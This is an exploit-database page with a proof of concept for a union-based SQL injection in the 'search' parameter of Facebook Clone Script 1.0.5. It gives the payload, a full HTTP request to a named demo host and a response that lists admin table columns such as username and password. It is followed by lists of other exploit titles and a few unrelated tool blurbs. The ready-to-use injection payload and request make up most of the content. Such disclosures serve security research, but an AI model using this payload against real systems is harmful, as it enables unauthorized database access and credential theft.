Menu

Search for hundreds of thousands of exploits

"Facebook Clone Script 1.0.5 - 'search' SQL Injection"

Author

Exploit author

L0RD

Platform

Exploit platform

php

Release date

Exploit published date

2018-05-29

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
# Exploit Title: Facebook Clone Script 1.0.5 - 'search' SQL Injection
# Date: 2018-05-29
# Exploit Author: L0RD
# Vendor Homepage: https://www.phpscriptsmall.com/product/facebook-clone/
# Version: 1.0.5
# Tested on: Win 10

# POC : SQLi :

# Parameter : search
# Type : Union based
# Payload : 
1' UNION SELECT NULL,group_concat(table_name,0x3a,column_name),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
from information_schema.columns where table_schema=schema()#

# Request

POST /demo/fbclone/top-search.php HTTP/1.1
Host: smsemailmarketing.in
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0)
Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://smsemailmarketing.in/demo/fbclone/setting.php
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 231
Connection: keep-alive

search=1' UNION SELECT NULL,group_concat(table_name,0x3C62723E,column_name),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
from information_schema.columns where table_schema=schema()#

# Response

HTTP/1.1 200 OK
Server: nginx/1.12.2
Date: Tue, 29 May 2018 17:12:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Content-Length: 5370

<a href='friend-profile.php?id='><img  src="images/unknown.jpeg"
height="40px"
width="40px">About_you:a_id,about_you:u_id,about_you:u_nick,about_you:u_nickname,about_you:u_nick_show,about_you:nick_privacy,admin:id,admin:name,admin:username,admin:password,admin:ref_password,admin:sex,admin:email_id,admin:valid_id,admin:user_type,admin:user_level,admin:city_code,admin:state_code,admin:country_code,admin:userimages,admin:description
</a></div>
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2018-09-05 "Microsoft People 10.1807.2131.0 - Denial of service (PoC)" dos windows_x86-64 L0RD
2018-08-30 "Nord VPN 6.14.31 - Denial of Service (PoC)" dos windows_x86-64 L0RD
2018-08-29 "NASA openVSP 3.16.1 - Denial of Service (PoC)" dos windows_x86-64 L0RD
2018-08-27 "Firefox 55.0.3 - Denial of Service (PoC)" dos windows_x86-64 L0RD
2018-08-23 "Twitter-Clone 1 - 'code' SQL Injection" webapps php L0RD
2018-08-21 "Twitter-Clone 1 - Cross-Site Request Forgery (Delete Post)" webapps php L0RD
2018-08-21 "Twitter-Clone 1 - 'userid' SQL Injection" webapps php L0RD
2018-07-11 "Instagram-Clone Script 2.0 - Cross-Site Scripting" webapps php L0RD
2018-07-04 "ShopNx - Arbitrary File Upload" webapps php L0RD
2018-07-04 "Online Trade - Information Disclosure" webapps php L0RD
2018-06-18 "Joomla! Component Jomres 9.11.2 - Cross-Site Request Forgery (Add User)" webapps php L0RD
2018-06-12 "Joomla! Component EkRishta 2.10 - 'username' SQL Injection" webapps php L0RD
2018-06-07 "WampServer 3.0.6 - Cross-Site Request Forgery" webapps php L0RD
2018-06-03 "Smartshop 1 - 'id' SQL Injection" webapps php L0RD
2018-06-03 "Smartshop 1 - Cross-Site Request Forgery" webapps php L0RD
2018-05-29 "Facebook Clone Script 1.0.5 - Cross-Site Request Forgery" webapps php L0RD
2018-05-29 "Facebook Clone Script 1.0.5 - 'search' SQL Injection" webapps php L0RD
2018-05-28 "Joomla! Component Full Social 1.1.0 - 'search_query' SQL Injection" webapps php L0RD
2018-05-28 "Joomla! Component jCart for OpenCart 2.3.0.2 - Cross-Site Request Forgery" webapps php L0RD
2018-05-28 "Joomla! Component JoomOCShop 1.0 - Cross-Site Request Forgery" webapps php L0RD
2018-05-24 "Timber 1.1 - Cross-Site Request Forgery" webapps php L0RD
2018-05-23 "eWallet Online Payment Gateway 2 - Cross-Site Request Forgery" webapps php L0RD
2018-05-23 "Mcard Mobile Card Selling Platform 1 - SQL Injection" webapps php L0RD
2018-05-23 "Mobile Card Selling Platform 1 - Cross-Site Request Forgery" webapps php L0RD
2018-05-22 "Auto Car 1.2 - 'car_title' SQL Injection / Cross-Site Scripting" webapps php L0RD
2018-05-22 "Zechat 1.5 - SQL Injection / Cross-Site Request Forgery" webapps php L0RD
2018-05-22 "iSocial 1.2.0 - Cross-Site Scripting / Cross-Site Request Forgery" webapps php L0RD
2018-05-21 "Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Cross-Site Scripting / Cross-Site Request Forgery" webapps php L0RD
2018-05-21 "Private Message PHP Script 2.0 - Cross-Site Scripting" webapps php L0RD
2018-05-21 "Wchat PHP AJAX Chat Script 1.5 - Cross-Site Scripting" webapps php L0RD
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.